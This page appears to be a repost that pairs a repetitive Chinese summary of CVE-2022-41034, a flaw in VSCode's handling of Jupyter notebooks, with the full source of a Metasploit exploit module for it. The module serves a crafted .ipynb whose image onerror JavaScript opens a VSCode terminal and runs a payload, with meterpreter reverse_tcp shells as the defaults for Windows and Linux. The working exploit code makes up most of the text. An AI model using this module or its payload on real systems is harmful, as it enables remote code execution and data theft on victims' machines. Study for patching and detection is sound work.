该漏洞利用了 VSCode 在打开 Jupyter Notebook 文件时绕过信任模型的缺陷，允许在版本 1.4.0 到 1.71.1 中的 Jupyter Notebook 文件嵌入 HTML 和 JavaScript 代码，并通过打开新的终端窗口在 VSCode 中执行任意代码。攻击者可以利用该漏洞在受害者机器上执行恶意代码，例如远程控制受害者机器或窃取敏感信息。

💥 该漏洞利用了 VSCode 在打开 Jupyter Notebook 文件时绕过信任模型的缺陷，允许攻击者在 Jupyter Notebook 文件中嵌入 HTML 和 JavaScript 代码。

💻 当用户打开包含恶意代码的 Jupyter Notebook 文件时，VSCode 会执行嵌入的 JavaScript 代码，并打开新的终端窗口。

😈 攻击者可以通过在终端窗口中执行任意代码来控制受害者机器，例如执行恶意程序、窃取敏感信息或进行其他恶意操作。

🛡️ 为了防止该漏洞被利用，建议用户及时更新 VSCode 到最新版本，并谨慎打开来自未知来源的 Jupyter Notebook 文件。

⚠️ 由于该漏洞可能导致攻击者获得受害者机器的控制权，建议用户在使用 VSCode 时注意安全，并及时更新软件以修复漏洞。

💻 攻击者可以通过在 Jupyter Notebook 文件中嵌入 HTML 和 JavaScript 代码来绕过 VSCode 的信任模型，并在打开文件时执行恶意代码。

😈 恶意代码可以在新的终端窗口中执行，攻击者可以利用该漏洞来控制受害者机器或窃取敏感信息。

🛡️ 建议用户及时更新 VSCode 到最新版本，并谨慎打开来自未知来源的 Jupyter Notebook 文件，以防止该漏洞被利用。

This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::RemoteRank = ExcellentRankinginclude Msf::Exploit::Remote::HttpServerdef initialize(info = {})super(update_info(info,'Name' => 'VSCode ipynb Remote Development RCE','Description' => %q{VSCode when opening an Jupyter notebook (.ipynb) file bypasses the trust model.On versions v1.4.0 - v1.71.1, its possible for the Jupyter notebook to embedHTML and javascript, which can then open new terminal windows within VSCode.Each of these new windows can then execute arbitrary code at startup.During testing, the first open of the Jupyter notebook resulted in pop-upsdisplaying errors of unable to find the payload exe file. The second attemptat opening the Jupyter notebook would result in successful exeuction.Successfully tested against VSCode 1.70.2 on Windows 10.},'License' => MSF_LICENSE,'Author' => ['h00die', # metasploit module'Zemnmez'],'References' => [['URL', 'https://github.com/google/security-research/security/advisories/GHSA-pw56-c55x-cm9m'],['CVE', '2022-41034'],['URL', 'https://github.com/andyhsu024/CVE-2022-41034']],'DisclosureDate' => '2022-11-22','Privileged' => false,'Arch' => ARCH_CMD,'Stance' => Stance::Aggressive,'Payload' => { 'BadChars' => '&"' },'Targets' => [['Windows',{'Platform' => 'win','DefaultOptions' => {'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp'}}],['Linux File-Dropper',{'Platform' => 'linux','DefaultOptions' => {'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'}}]],'DefaultTarget' => 0,'DefaultOptions' => {'WfsDelay' => 3_600, # 1hr'URIPATH' => 'project.ipynb'},'Notes' => {'Stability' => [CRASH_SAFE],# on windows it will say the final payload can't be found# however, it is, seems to be a timing issue, 2nd exploit attempt# works perfectly'Reliability' => [REPEATABLE_SESSION, FIRST_ATTEMPT_FAIL],'SideEffects' => [SCREEN_EFFECTS]}))register_options([OptString.new('PAYLOAD_FILENAME', [ false, 'Name of the payload file - only required when exploiting on Linux.', 'shell.sh' ]),OptString.new('WRITABLE_DIR', [ false, 'Name of the writable directory containing the payload file - required when exploiting on Linux .', '/tmp/' ]),])enddef checkCheckCode::Unsupportedenddef exploitunless datastore['URIPATH'].end_with? '.ipynb'fail_with(Failure::BadConfig, 'URIPATH must end in .ipynb for exploit to be successful')endprint_status('Starting up web service...')start_servicesleep(datastore['WFSDELAY'])enddef on_request_uri(cli, request)super unless request.uri.end_with? datastore['URIPATH']if target['Platform'] == 'win'config = { 'executable' => 'cmd.exe', 'args' => "/c #{payload.raw}" }elseconfig = { 'executable' => "/#{datastore['WRITABLE_DIR']}/#{datastore['PAYLOAD_FILENAME']}" }endpload = JSON.dump({ 'config' => config })pload = CGI.escape(pload).gsub('+', '%20') # XXX not sure if this is needed or not, but it worksipynb = %|{"cells": [{"cell_type": "markdown","metadata": {},"source": ["<img src=a onerror=\"let q = document.createElement('a');q.href='command:workbench.action.terminal.new?#{pload}';document.body.appendChild(q);q.click()\"/>"]}]}|send_response(cli, ipynb, {'Connection' => 'close','Pragma' => 'no-cache','Access-Control-Allow-Origin' => '*'})print_status("Sent #{datastore['URIPATH']} to #{cli.peerhost}")endend